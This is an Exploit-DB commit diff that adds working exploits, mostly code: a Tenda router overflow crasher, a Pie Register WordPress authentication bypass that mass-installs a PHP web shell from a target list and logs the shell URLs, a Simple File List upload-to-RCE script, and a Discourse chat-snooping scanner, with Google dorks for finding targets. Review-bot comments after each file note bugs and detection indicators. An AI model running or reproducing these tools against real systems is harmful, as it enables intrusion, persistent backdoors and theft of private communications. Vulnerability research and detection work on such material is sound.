DB: 2025-07-23

13 changes to exploits/shellcodes/ghdb

Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow

Discourse 3.1.1 - Unauthenticated Chat Message Access

Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE

Simple File List WordPress Plugin 4.2.2 - File Upload to RCE

Joomla JS Jobs plugin 1.4.2 - SQL injection
LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Department Assignment Alias Nick Field
LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Facebook Integration Page Name Field
LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Operator Surname
LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Personal Canned Messages
LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Telegram Bot Username
LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via the Chat Transfer Function

Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)
Exploit-DB 2025-07-23 00:16:47 +00:00
parent 08e51ef2f9
commit 599853959f
13 changed files with 1647 additions and 0 deletions


@ -0,0 +1,381 @@
/*
* Title : Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow
* Author : Byte Reaper
* Telegram : @ByteReaper0
* CVE : CVE-2025-7795
* Vulnerability : Buffer Overflow
* Description :
* A buffer overflow vulnerability affecting certain Tenda routers,
* exploitable via an unauthenticated POST request to an unprotected endpoint, leading to service crash.
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include "argparse.h"
#include <arpa/inet.h>
#include <stdlib.h>
#include <curl/curl.h>
#include <sys/wait.h>
#define FULL_URL 2500
#define POST_DATA 10000
const char *targetUrl = NULL;
const char *targetip = NULL;
int selectIp = 0;
int selectUrl = 0;
int verbose = 0;
int showOne = 0;
char postData[POST_DATA];
struct Mem
{
char *buffer;
size_t len;
};
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
{
size_t total = size * nmemb;
struct Mem *m = (struct Mem *)userdata;
char *tmp = realloc(m->buffer, m->len + total + 1);
if (!tmp) return 0;
m->buffer = tmp;
memcpy(&(m->buffer[m->len]), ptr, total);
m->len += total;
m->buffer[m->len] = '\0';
return total;
}
void pingPacket()
{
int pid = fork();
printf("\n============================================== [Ping] ==============================================\n");
if (pid < 0)
{
perror("\e[1;31m[-] Fork Failed!\e[0m");
exit(1);
}
if (pid == 0)
{
printf("\e[1;32m[+] Child Process (Ping) -> PID: %d\e[0m\n",
getpid());
char *const argv[] = { "/bin/ping",
"-c",
"3",
(char *)targetip,
NULL };
char *const envp[] = { NULL };
__asm__ volatile
(
"mov $59, %%rax\n\t"
"mov %[prog], %%rdi\n\t"
"mov %[argv], %%rsi\n\t"
"mov %[envp], %%rdx\n\t"
"syscall\n\t"
"mov $60, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
: [prog] "r" (argv[0]),
[argv] "r" (argv),
[envp] "r" (envp)
: "rax", "rdi", "rsi", "rdx"
);
}
else
{
printf("\e[1;32m[+] Main PID : %d\e[0m\n",
getpid());
int status;
waitpid(pid,
&status,
0);
if (WIFEXITED(status))
{
int code = WEXITSTATUS(status);
printf("\e[1;33m[+] Ping exited with code: %d\e[0m\n",
code);
if (code == 0)
{
printf("\e[1;31m[-] Successfully confirmed connection via ping!\e[0m\n");
printf("\e[1;31m[-] The server is still working, please try again!\n\e[0m");
}
else
{
printf("\e[1;34m[+] The server is not responding to the ping request!\e[0m\n");
printf("\e[1;34m[+] CVE-2025-7795: Vulnerability confirmed! Server is down.\e[0m\n");
}
}
}
printf("\n============================================================================================\e[0m\n");
}
void sendRequest()
{
CURL *c = curl_easy_init();
CURLcode res;
char full[FULL_URL];
struct Mem response = {NULL, 0};
if (!c) {
printf("\e[1;31m[-] Error Create Object Curl !\e[0m\n");
exit(EXIT_FAILURE);
}
if (targetip) selectIp = 1;
if (targetUrl) selectUrl = 1;
if (selectIp)
{
snprintf(full,
sizeof(full),
"http://%s/goform/fromP2pListFilter",
targetip);
}
if (selectUrl)
{
snprintf(full,
sizeof(full),
"%s/goform/fromP2pListFilter",
targetUrl);
}
int rounds = 5;
int baseLen = 3500, step = 1000;
showOne = 1;
for (int i = 0; i < rounds; i++)
{
int len = baseLen + i * step;
if (len + 6 >= sizeof(postData)) break;
snprintf(postData, sizeof(postData), "list=");
memset(postData + 5, 'A', len);
postData[5 + len] = '\0';
printf("\e[1;34m[%d] Iteration %d - Length: %d\e[0m\n",
i+1,
i+1,
len);
if (verbose)
{
printf("\e[1;35m\n====================================================================[Post Data] ====================================================================\e[0m\n");
printf("%s\e[0m\n\n", postData);
printf("\e[1;35m====================================================================[Post Data] ====================================================================\e[0m\n");
}
curl_easy_reset(c);
curl_easy_setopt(c,
CURLOPT_URL,
full);
curl_easy_setopt(c,
CURLOPT_ACCEPT_ENCODING,
"");
curl_easy_setopt(c,
CURLOPT_FOLLOWLOCATION,
1L);
curl_easy_setopt(c,
CURLOPT_POST,
1L);
curl_easy_setopt(c,
CURLOPT_POSTFIELDS,
postData);
curl_easy_setopt(c,
CURLOPT_POSTFIELDSIZE,
(long)strlen(postData));
curl_easy_setopt(c,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(c,
CURLOPT_WRITEDATA,
&response);
curl_easy_setopt(c,
CURLOPT_CONNECTTIMEOUT,
5L);
curl_easy_setopt(c,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(c,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(c,
CURLOPT_SSL_VERIFYHOST,
0L);
struct curl_slist *h = NULL;
h = curl_slist_append(h,
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
h = curl_slist_append(h,
"Accept-Encoding: gzip, deflate, br");
h = curl_slist_append(h,
"Accept-Language: en-US,en;q=0.5");
h = curl_slist_append(h,
"Connection: keep-alive");
h = curl_slist_append(h,
"Referer: http://example.com");
h = curl_slist_append(h,
"Cache-Control: no-cache");
h = curl_slist_append(h,
"Pragma: no-cache");
curl_easy_setopt(c, CURLOPT_HTTPHEADER, h);
if (verbose) curl_easy_setopt(c, CURLOPT_VERBOSE, 1L);
char *encode1 = curl_easy_escape(c, full, 0);
if (!encode1)
{
printf("\e[1;31m[-] URL encoding failed for payload\e[0m\n");
exit(EXIT_FAILURE);
}
if (verbose && showOne)
{
printf("\e[1;37m=========================================");
if (selectUrl) printf("\e[1;37m[+] Input Url : %s\e[0m\n[+] Encode Url : %s\e[0m\n[+] full format Url : %s\e[0m\n",
targetUrl,
encode1,
full);
if (selectIp) printf("\e[1;37m[+] Input Ip : %s\e[0m\n[+] full format Url : %s\e[0m\n",
targetip,
full);
printf("=========================================");
showOne = 0;
}
res = curl_easy_perform(c);
curl_slist_free_all(h);
curl_free(encode1);
if (response.buffer)
{
free(response.buffer);
response.buffer = NULL;
response.len = 0;
}
if (res == CURLE_OK)
{
long httpCode = 0;
printf("\e[1;36m[+] Request sent successfully\e[0m\n");
curl_easy_getinfo(c, CURLINFO_RESPONSE_CODE,
&httpCode);
printf("\e[1;32m[+] Http Code Response : %ld\e[0m\n",
httpCode);
if (httpCode >= 200 && httpCode < 300)
{
printf("\e[1;31m[-] The server was not affected, still working !\n");
printf("\e[1;33m-------------------------------- Response Server --------------------------------\e[0m\n");
printf("%s\e[0m\n",
response.buffer);
printf("\e[1;33m-----------------------------------------------------------------------------------\e[0m\n");
}
else
{
printf("\e[1;34m[+] Negative server response. I started trying to confirm the connection...\e[0m\n");
printf("[+] Run Command Ping For Check Connection : \e[0m\n");
if (selectIp) pingPacket();
else printf("[-] Error Run Command Ping for URl !\e[0m\n[-] Please Enter Target Ip for Check Connection !\e[0m\n");
}
}
else
{
printf("[-] Error Send Request, Please Check Your Connection !\e[0m\n");
printf("[-] Error : %s\n", curl_easy_strerror(res));
}
}
free(response.buffer);
curl_easy_cleanup(c);
}
int main(int argc,
const char **argv)
{
printf(
"\e[1;31m"
"▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▄▖ \n"
"▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖ ▌ ▌▙▌▙▖ \n"
"▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▌ ▌▄▌▄▌ \n"
" \e[1;37mByte Reaper\e[0m\n"
);
printf("\e[1;37m---------------------------------------------------------------------------------------------------------------------------------\e[0m\n");
if (getuid() != 0)
{
printf("===================================================\e[0m\n");
printf("[-] Not running as root. Trying with sudo...\e[0m\n");
char *args[] = {(char*)"sudo",
(char*)"./exploit",
NULL};
execvp("sudo", args);
perror("[-] Error Run Exploit in Root !");
__asm__ volatile
(
"mov $0x3C, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
:
: "rdi"
);
}
printf("\e[1;36m[+] Running as root! Exploit continues...\e[0m\n");
printf("===================================================\e[0m\n");
struct argparse_option options[] =
{
OPT_HELP(),
OPT_STRING('i',
"ip",
&targetip,
"Enter Target IP"),
OPT_STRING('u',
"url",
&targetUrl,
"Enter Target URL"),
OPT_BOOLEAN('v',
"verbose",
&verbose,
"Verbose Mode"),
OPT_END(),
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
argv);
if (!targetip && !targetUrl)
{
printf("\e[1;33m[-] Please Enter Target IP OR URl !\e[0m\n");
printf("\e[1;33m[!] Exemple : ./exploit -u http://ROUTER_IP\e[0m\n");
printf("[+] OR \n");
printf("\e[1;33m[!] Exemple : ./exploit -i ROUTER_IP\e[0m\n");
__asm__ volatile(
"xor %%rdi, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"1:\n\t"
"syscall\n\t"
:
:
: "rax", "rdi", "rsi"
);
}
if (targetip && targetUrl)
{
printf("[+] Please Enter Traget URL OR Traget Ip address, Exit...\e[0m\n");
__asm__ volatile
(
"mov $0x3C, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
:
:"rdi"
);
}
if (selectIp)
{
sendRequest();
}
else
{
sendRequest();
}
return 0;
}
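Review bot: In `sendRequest`, `response.buffer` is freed and set to NULL immediately after `curl_easy_perform`, yet the 2xx branch further down passes it to `printf("%s\e[0m\n", response.buffer)`; that is a NULL `%s` argument (undefined behaviour), so the free-and-reset block belongs after the status handling. `main` also insists on root and re-runs itself as `sudo ./exploit` without forwarding `argv`, although nothing visible here needs privileges, so anyone reproducing this in a lab would be running unreviewed PoC code as root for no benefit. The hand-written `syscall` blocks (59 and 60, i.e. execve and exit on x86-64 Linux) make the file architecture-specific where `execve()` and `_exit()` would do the same. A header comment naming the observable, an unauthenticated POST to `/goform/fromP2pListFilter` with a `list` value of 3500 bytes or more, would help anyone writing a detection rule.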


@ -0,0 +1,90 @@
# Exploit Title: Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE
# Google Dork: inurl:/wp-content/plugins/pie-register/
# Date: 2025-07-09
# Exploit Author: Md Amanat Ullah (xSwads)
# Vendor Homepage: https://wordpress.org/plugins/pie-register/
# Software Link:
https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip
# Version: <= 3.7.1.4
# Tested on: Ubuntu 22.04
# CVE: CVE-2025-34077
#!/usr/bin/env python3
import requests
import zipfile
import io
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed
from colorama import Fore, Style, init
from threading import Lock
init(autoreset=True)
SHELL_PHP = "<?php if(isset($_GET['cmd'])) echo shell_exec($_GET['cmd']); ?>"
PLUGIN_DIR = "evilplugin"
ZIP_NAME = "evilplugin.zip"
SHELL_FILE = "shell.php"
OUTPUT_FILE = "Shells.txt"
HEADERS = {'User-Agent': 'Mozilla/5.0'}
TIMEOUT = 10
lock = Lock()
def FilterURLS(site):
site = site.strip()
if not site.startswith(('http://', 'https://')):
site = 'http://' + site
if not site.endswith('/'):
site += '/'
return site
def make_shell_zip():
buf = io.BytesIO()
with zipfile.ZipFile(buf, 'w') as z:
z.writestr(f"{PLUGIN_DIR}/{PLUGIN_DIR}.php", "<?php /* Plugin */ ?>")
z.writestr(f"{PLUGIN_DIR}/{SHELL_FILE}", SHELL_PHP)
buf.seek(0)
return buf
def exploit(target):
target = FilterURLS(target)
session = requests.Session()
data = {"social_site": "true", "user_id_social_site": "1"}
try:
r = session.post(f"{target}?pr_social_login=1", data=data, headers=HEADERS, timeout=TIMEOUT)
except:
print(f"{Fore.RED}[Failed] - {target}")
return
if not session.cookies:
print(f"{Fore.RED}[Failed] - {target}")
return
files = {"pluginzip": (ZIP_NAME, make_shell_zip(), "application/zip")}
try:
upload = session.post(f"{target}wp-admin/plugin-install.php?upload", files=files, headers=HEADERS, timeout=TIMEOUT)
except:
print(f"{Fore.RED}[Failed] - {target}")
return
if "Plugin installed successfully" in upload.text:
shell_url = f"{target}wp-content/plugins/{PLUGIN_DIR}/{SHELL_FILE}"
print(f"{Fore.GREEN}[Exploited] - {shell_url}")
with lock:
with open(OUTPUT_FILE, "a") as f:
f.write(shell_url + "\n")
else:
print(f"{Fore.RED}[Failed] - {target}")
def main(targets_file):
with open(targets_file, "r") as f:
targets = [line.strip() for line in f if line.strip()]
with ThreadPoolExecutor(max_workers=100) as executor:
futures = [executor.submit(exploit, target) for target in targets]
for _ in as_completed(futures):
pass
if __name__ == "__main__":
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} list.txt")
sys.exit(1)
main(sys.argv[1])
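Review bot: The archive built in `make_shell_zip` installs `shell.php`, which runs any `cmd` query parameter with no access check, and `exploit` never removes the plugin afterwards, so every host where the check succeeds is left with an open command endpoint whose URL is appended to `Shells.txt`. For confirming CVE-2025-34077 a harmless marker file would be enough, as the Simple File List script in this same commit does with `<?php echo 'Vuln!!!'; ?>`, and a comment should record that `wp-content/plugins/evilplugin/` has to be deleted after a test. The header would also benefit from listing what a site owner can search logs for, all of it visible in the code: a POST to `?pr_social_login=1` carrying `social_site=true` and `user_id_social_site=1`, followed by a plugin upload from the same session. The `#!/usr/bin/env python3` line sits below the comment header, so it has no effect as a shebang.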


@ -0,0 +1,103 @@
# Exploit Title: Simple File List WordPress Plugin 4.2.2 - File Upload to RCE
# Google Dork: inurl:/wp-content/plugins/simple-file-list/
# Date: 2025-07-15
# Exploit Author: Md Amanat Ullah (xSwads)
# Vendor Homepage: https://wordpress.org/plugins/simple-file-list/
# Software Link:
https://downloads.wordpress.org/plugin/simple-file-list.4.2.2.zip
# Version: <= 4.2.2
# Tested on: Ubuntu 22.04
# CVE: CVE-2020-36847
#!/usr/bin/env python3
import requests
import sys, os
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urljoin
from colorama import Fore, init
init(autoreset=True)
HEADERS = {'User-Agent': 'Mozilla/5.0'}
PHP_PAYLOAD = "<?php echo 'Vuln!!!'; ?>"
UPLOAD_PATH = "wp-content/plugins/simple-file-list/ee-upload-engine.php"
RENAME_PATH = "wp-content/plugins/simple-file-list/ee-file-engine.php"
UPLOAD_FOLDER = "wp-content/uploads/simple-file-list/"
def FilterURLS(site):
site = site.strip()
if not site.startswith(('http://', 'https://')):
site = 'http://' + site
if not site.endswith('/'):
site += '/'
return site
def upload_payload(base):
upload_url = urljoin(base, UPLOAD_PATH)
try:
files = {'file': ('pwn.png', PHP_PAYLOAD, 'image/png')}
r = requests.post(upload_url, files=files, headers=HEADERS, timeout=10, verify=False)
r.raise_for_status()
result = r.json()
return result.get('file')
except Exception:
return None
def rename_payload(base, filename):
rename_url = urljoin(base, RENAME_PATH)
try:
new_name = filename[:-4] + '.php'
data = {'oldFile': filename, 'newFile': new_name}
r = requests.post(rename_url, data=data, headers=HEADERS, timeout=10, verify=False)
r.raise_for_status()
result = r.json()
return result.get('newFile')
except Exception:
return None
def exploit(site):
base = FilterURLS(site)
try:
filename = upload_payload(base)
if not filename:
print(Fore.RED + f"[Failed] - {site}")
return
newfile = rename_payload(base, filename)
if not newfile:
print(Fore.RED + f"[Failed] - {site}")
return
shell_url = urljoin(base, UPLOAD_FOLDER + newfile)
r = requests.get(shell_url, headers=HEADERS, timeout=10, verify=False)
if r.status_code == 200:
print(Fore.GREEN + f"[Exploited] - {shell_url}")
with open("shells_found.txt", "a") as f:
f.write(shell_url + "\n")
else:
print(Fore.RED + f"[Failed] - {site}")
except Exception:
print(Fore.RED + f"[Failed] - {site}")
def main():
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} list.txt")
sys.exit(1)
targets_file = sys.argv[1]
if not os.path.isfile(targets_file):
print(f"File {targets_file} not found.")
sys.exit(1)
with open(targets_file) as f:
targets = [line.strip() for line in f if line.strip()]
with ThreadPoolExecutor(max_workers=100) as executor:
futures = [executor.submit(exploit, target) for target in targets]
for _ in as_completed(futures):
pass
if __name__ == "__main__":
requests.packages.urllib3.disable_warnings()
main()
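Review bot: `exploit` leaves the renamed `.php` file in `wp-content/uploads/simple-file-list/` and only records its URL in `shells_found.txt`; there is no cleanup step and no comment telling the tester to delete the file, so a test instance is left with an uploaded PHP file in a web-served directory. Every request uses `verify=False`, the `__main__` block disables the urllib3 warning globally, and each `except Exception` collapses timeouts, TLS errors and patched responses into the same `[Failed]` line, so the output cannot be read as evidence that a site is not vulnerable. For detection the header could name the sequence the code performs: an unauthenticated POST to `ee-upload-engine.php` followed by a POST to `ee-file-engine.php` whose `newFile` ends in `.php`.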


@ -0,0 +1,565 @@
#!/usr/bin/env ruby
# Title : Discourse 3.1.1 - Unauthenticated Chat Message Access
# CVE-2023-45131
# CVSS: 7.5 (High)
# Affected: Discourse < 3.1.1 stable, < 3.2.0.beta2
# Author ibrahimsql @ https://twitter.com/ibrahmsql
# Date: 2023-12-14
require 'net/http'
require 'uri'
require 'json'
require 'openssl'
require 'base64'
class CVE202345131
def initialize(target_url)
@target_url = target_url.chomp('/')
@results = []
@message_bus_client_id = nil
@csrf_token = nil
end
def run_exploit
puts "\n[*] Testing CVE-2023-45131: Discourse Unauthenticated Chat Message Access"
puts "[*] Target: #{@target_url}"
puts "[*] CVSS Score: 7.5 (High)"
puts "[*] Affected: Discourse < 3.1.1 stable, < 3.2.0.beta2\n"
# Test MessageBus access
test_messagebus_access
test_chat_channel_enumeration
test_private_message_access
test_real_time_monitoring
test_message_history_access
test_user_enumeration_via_chat
generate_report
@results
end
private
def test_messagebus_access
puts "[*] Testing MessageBus unauthenticated access..."
begin
# Get MessageBus client ID
uri = URI("#{@target_url}/message-bus/poll")
response = make_request(uri, 'GET')
if response && response.code == '200'
begin
data = JSON.parse(response.body)
if data.is_a?(Array) && !data.empty?
@message_bus_client_id = extract_client_id(response)
@results << {
vulnerability: "MessageBus Access",
severity: "High",
description: "Unauthenticated access to MessageBus endpoint confirmed",
impact: "Can monitor real-time messages and notifications",
client_id: @message_bus_client_id
}
puts "[+] MessageBus access confirmed - Client ID: #{@message_bus_client_id}"
return true
end
rescue JSON::ParserError
# Try alternative endpoints
test_alternative_messagebus_endpoints
end
end
rescue => e
puts "[!] Error testing MessageBus access: #{e.message}"
end
false
end
def test_alternative_messagebus_endpoints
puts "[*] Testing alternative MessageBus endpoints..."
endpoints = [
"/message-bus/poll",
"/message-bus/subscribe",
"/message-bus/diagnostics",
"/message-bus/long-poll"
]
endpoints.each do |endpoint|
begin
uri = URI("#{@target_url}#{endpoint}")
response = make_request(uri, 'GET')
if response && response.code == '200'
if response.body.include?('message-bus') || response.body.include?('clientId')
@results << {
vulnerability: "Alternative MessageBus Endpoint",
severity: "Medium",
endpoint: endpoint,
description: "Alternative MessageBus endpoint accessible",
impact: "Potential message monitoring capability"
}
puts "[+] Alternative endpoint accessible: #{endpoint}"
end
end
rescue => e
puts "[!] Error testing endpoint #{endpoint}: #{e.message}"
end
end
end
def test_chat_channel_enumeration
puts "[*] Testing chat channel enumeration..."
return unless @message_bus_client_id
begin
# Try to enumerate chat channels
uri = URI("#{@target_url}/message-bus/poll")
# Subscribe to chat channels
data = {
'/chat/new-messages' => -1,
'/chat/channel-status' => -1,
'/chat/user-tracking' => -1,
'clientId' => @message_bus_client_id
}
response = make_request(uri, 'POST', data)
if response && response.code == '200'
begin
messages = JSON.parse(response.body)
if messages.is_a?(Array) && !messages.empty?
chat_channels = extract_chat_channels(messages)
if !chat_channels.empty?
@results << {
vulnerability: "Chat Channel Enumeration",
severity: "High",
channels: chat_channels,
description: "Enumerated accessible chat channels",
impact: "Can identify active chat channels and participants"
}
puts "[+] Chat channels enumerated: #{chat_channels.join(', ')}"
end
end
rescue JSON::ParserError => e
puts "[!] Error parsing chat channel response: #{e.message}"
end
end
rescue => e
puts "[!] Error enumerating chat channels: #{e.message}"
end
end
def test_private_message_access
puts "[*] Testing private message access..."
return unless @message_bus_client_id
begin
# Try to access private messages
uri = URI("#{@target_url}/message-bus/poll")
# Subscribe to private message channels
data = {
'/private-messages' => -1,
'/chat/private' => -1,
'/notification' => -1,
'clientId' => @message_bus_client_id
}
response = make_request(uri, 'POST', data)
if response && response.code == '200'
begin
messages = JSON.parse(response.body)
if messages.is_a?(Array)
private_messages = extract_private_messages(messages)
if !private_messages.empty?
@results << {
vulnerability: "Private Message Access",
severity: "Critical",
messages: private_messages,
description: "Accessed private chat messages without authentication",
impact: "Complete breach of private communication confidentiality"
}
puts "[+] Private messages accessed: #{private_messages.length} messages found"
# Log sample messages (redacted)
private_messages.first(3).each_with_index do |msg, idx|
puts " [#{idx + 1}] #{redact_message(msg)}"
end
end
end
rescue JSON::ParserError => e
puts "[!] Error parsing private message response: #{e.message}"
end
end
rescue => e
puts "[!] Error accessing private messages: #{e.message}"
end
end
def test_real_time_monitoring
puts "[*] Testing real-time message monitoring..."
return unless @message_bus_client_id
begin
puts "[*] Monitoring for 10 seconds..."
start_time = Time.now
monitored_messages = []
while (Time.now - start_time) < 10
uri = URI("#{@target_url}/message-bus/poll")
data = {
'/chat/new-messages' => 0,
'clientId' => @message_bus_client_id
}
response = make_request(uri, 'POST', data)
if response && response.code == '200'
begin
messages = JSON.parse(response.body)
if messages.is_a?(Array) && !messages.empty?
new_messages = extract_new_messages(messages)
monitored_messages.concat(new_messages)
end
rescue JSON::ParserError
# Continue monitoring
end
end
sleep(1)
end
if !monitored_messages.empty?
@results << {
vulnerability: "Real-time Message Monitoring",
severity: "High",
messages_count: monitored_messages.length,
description: "Successfully monitored real-time chat messages",
impact: "Can intercept live communications"
}
puts "[+] Real-time monitoring successful: #{monitored_messages.length} messages intercepted"
else
puts "[-] No real-time messages detected during monitoring period"
end
rescue => e
puts "[!] Error during real-time monitoring: #{e.message}"
end
end
def test_message_history_access
puts "[*] Testing message history access..."
begin
# Try to access message history through various endpoints
history_endpoints = [
"/chat/api/channels",
"/chat/api/messages",
"/chat/history",
"/api/chat/channels.json"
]
history_endpoints.each do |endpoint|
uri = URI("#{@target_url}#{endpoint}")
response = make_request(uri, 'GET')
if response && response.code == '200'
begin
data = JSON.parse(response.body)
if data.is_a?(Hash) && (data['messages'] || data['channels'] || data['chat'])
@results << {
vulnerability: "Message History Access",
severity: "High",
endpoint: endpoint,
description: "Accessed chat message history without authentication",
impact: "Historical chat data exposure"
}
puts "[+] Message history accessible via: #{endpoint}"
end
rescue JSON::ParserError
# Check for HTML responses that might contain chat data
if response.body.include?('chat') && response.body.include?('message')
@results << {
vulnerability: "Message History Exposure",
severity: "Medium",
endpoint: endpoint,
description: "Chat-related content found in response",
impact: "Potential information disclosure"
}
puts "[+] Chat-related content found in: #{endpoint}"
end
end
end
end
rescue => e
puts "[!] Error testing message history access: #{e.message}"
end
end
def test_user_enumeration_via_chat
puts "[*] Testing user enumeration via chat features..."
begin
# Try to enumerate users through chat-related endpoints
user_endpoints = [
"/chat/api/users",
"/chat/users.json",
"/api/chat/users",
"/chat/members"
]
user_endpoints.each do |endpoint|
uri = URI("#{@target_url}#{endpoint}")
response = make_request(uri, 'GET')
if response && response.code == '200'
begin
data = JSON.parse(response.body)
if data.is_a?(Hash) && (data['users'] || data['members'])
users = extract_users_from_chat(data)
if !users.empty?
@results << {
vulnerability: "User Enumeration via Chat",
severity: "Medium",
endpoint: endpoint,
users_count: users.length,
sample_users: users.first(5),
description: "Enumerated chat users without authentication",
impact: "User information disclosure"
}
puts "[+] Users enumerated via #{endpoint}: #{users.length} users found"
end
end
rescue JSON::ParserError
# Continue with next endpoint
end
end
end
rescue => e
puts "[!] Error testing user enumeration: #{e.message}"
end
end
def extract_client_id(response)
# Extract client ID from response headers or body
if response['X-MessageBus-Client-Id']
return response['X-MessageBus-Client-Id']
end
# Try to extract from response body
begin
data = JSON.parse(response.body)
if data.is_a?(Hash) && data['clientId']
return data['clientId']
end
rescue JSON::ParserError
end
# Generate a random client ID
SecureRandom.hex(16)
end
def extract_chat_channels(messages)
channels = []
messages.each do |message|
if message.is_a?(Hash)
if message['channel'] && message['channel'].include?('/chat/')
channels << message['channel']
elsif message['data'] && message['data'].is_a?(Hash)
if message['data']['channel_id']
channels << "Channel #{message['data']['channel_id']}"
end
end
end
end
channels.uniq
end
def extract_private_messages(messages)
private_msgs = []
messages.each do |message|
if message.is_a?(Hash)
if message['channel'] && (message['channel'].include?('/private') || message['channel'].include?('/chat/private'))
private_msgs << {
channel: message['channel'],
data: message['data'],
timestamp: message['timestamp'] || Time.now.to_i
}
elsif message['data'] && message['data'].is_a?(Hash)
if message['data']['message'] || message['data']['content']
private_msgs << {
content: message['data']['message'] || message['data']['content'],
user: message['data']['user'] || message['data']['username'],
timestamp: message['data']['timestamp'] || Time.now.to_i
}
end
end
end
end
private_msgs
end
def extract_new_messages(messages)
new_msgs = []
messages.each do |message|
if message.is_a?(Hash) && message['data']
new_msgs << {
channel: message['channel'],
data: message['data'],
timestamp: Time.now.to_i
}
end
end
new_msgs
end
def extract_users_from_chat(data)
users = []
if data['users'] && data['users'].is_a?(Array)
data['users'].each do |user|
if user.is_a?(Hash)
users << {
username: user['username'],
id: user['id'],
name: user['name']
}
end
end
elsif data['members'] && data['members'].is_a?(Array)
data['members'].each do |member|
if member.is_a?(Hash)
users << {
username: member['username'] || member['user'],
id: member['id'] || member['user_id']
}
end
end
end
users
end
def redact_message(message)
if message.is_a?(Hash)
content = message[:content] || message['content'] || message[:data] || 'N/A'
user = message[:user] || message['user'] || 'Unknown'
"User: #{user}, Content: #{content.to_s[0..50]}..."
else
message.to_s[0..50] + "..."
end
end
def make_request(uri, method = 'GET', data = nil, headers = {})
begin
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = (uri.scheme == 'https')
http.verify_mode = OpenSSL::SSL::VERIFY_NONE if http.use_ssl?
http.read_timeout = 10
http.open_timeout = 10
request = case method.upcase
when 'GET'
Net::HTTP::Get.new(uri.request_uri)
when 'POST'
req = Net::HTTP::Post.new(uri.request_uri)
if data
if data.is_a?(Hash)
req.set_form_data(data)
else
req.body = data
req['Content-Type'] = 'application/json'
end
end
req
end
# Set headers
request['User-Agent'] = 'Mozilla/5.0 (compatible; DiscourseMap/2.0)'
request['Accept'] = 'application/json, text/javascript, */*; q=0.01'
request['X-Requested-With'] = 'XMLHttpRequest'
headers.each { |key, value| request[key] = value }
response = http.request(request)
return response
rescue => e
puts "[!] Request failed: #{e.message}"
return nil
end
end
def generate_report
puts "\n" + "="*60
puts "CVE-2023-45131 Exploitation Report"
puts "="*60
puts "Target: #{@target_url}"
puts "Vulnerabilities Found: #{@results.length}"
if @results.empty?
puts "[+] No chat message access vulnerabilities detected"
else
puts "\n[!] VULNERABILITIES DETECTED:"
@results.each_with_index do |result, index|
puts "\n#{index + 1}. #{result[:vulnerability]}"
puts " Severity: #{result[:severity]}"
puts " Description: #{result[:description]}"
puts " Impact: #{result[:impact]}"
if result[:messages_count]
puts " Messages Found: #{result[:messages_count]}"
end
if result[:channels]
puts " Channels: #{result[:channels].join(', ')}"
end
if result[:endpoint]
puts " Endpoint: #{result[:endpoint]}"
end
end
puts "\n[!] REMEDIATION:"
puts "1. Update Discourse to version 3.1.1 stable or 3.2.0.beta2 or later"
puts "2. Implement proper authentication for MessageBus endpoints"
puts "3. Review and restrict access to chat-related APIs"
puts "4. Monitor MessageBus access logs for suspicious activity"
puts "5. Consider disabling chat features if not required"
end
puts "\n" + "="*60
end
end
# Run the exploit if called directly
if __FILE__ == $0
if ARGV.length != 1
puts "Usage: ruby #{$0} <target_url>"
puts "Example: ruby #{$0} https://discourse.example.com"
exit 1
end
target_url = ARGV[0]
exploit = CVE202345131.new(target_url)
exploit.run_exploit
end
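Review bot: Several checks record a finding on evidence that does not show CVE-2023-45131: `test_message_history_access` adds "Message History Exposure" whenever a non-JSON 200 body merely contains the strings `chat` and `message`, and `test_messagebus_access` reports "access confirmed" for any non-empty JSON array from `/message-bus/poll`, so the report should be treated as a lead and not as proof (whether an anonymous poll alone is abnormal depends on the site's configuration, which the script does not check). `extract_client_id` falls back to `SecureRandom.hex(16)`, but the file never requires `securerandom`, so that path presumably raises `NameError` and surfaces only as a generic error from the outer `rescue`. `redact_message` does not redact: it prints the user name and the first 51 characters of the content, so `# Log sample messages (redacted)` should either be reworded or the method changed to print lengths only. The header gives "Affected: Discourse < 3.1.1" while the title reads "Discourse 3.1.1"; one of the two needs correcting.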


@ -0,0 +1,65 @@
# Exploit Title: Joomla JS Jobs plugin 1.4.2 - SQL injection
# Google Dork: n/a
# Date: 07/07/2025
# Exploit Author: Adam Wallwork
# Vendor Homepage: https://joomsky.com/
# Demo: https://demo.joomsky.com/js-jobs/jm/free/
# Software Link: https://extensions.joomla.org/extension/js-jobs/
# Version: v1.4.2
# Tested on: v1.4.2
An SQL injection vulnerability exists in the JS Jobs extension (v1.4.2) via the 'cvid' parameter and is exploitable as the jobseeker user.
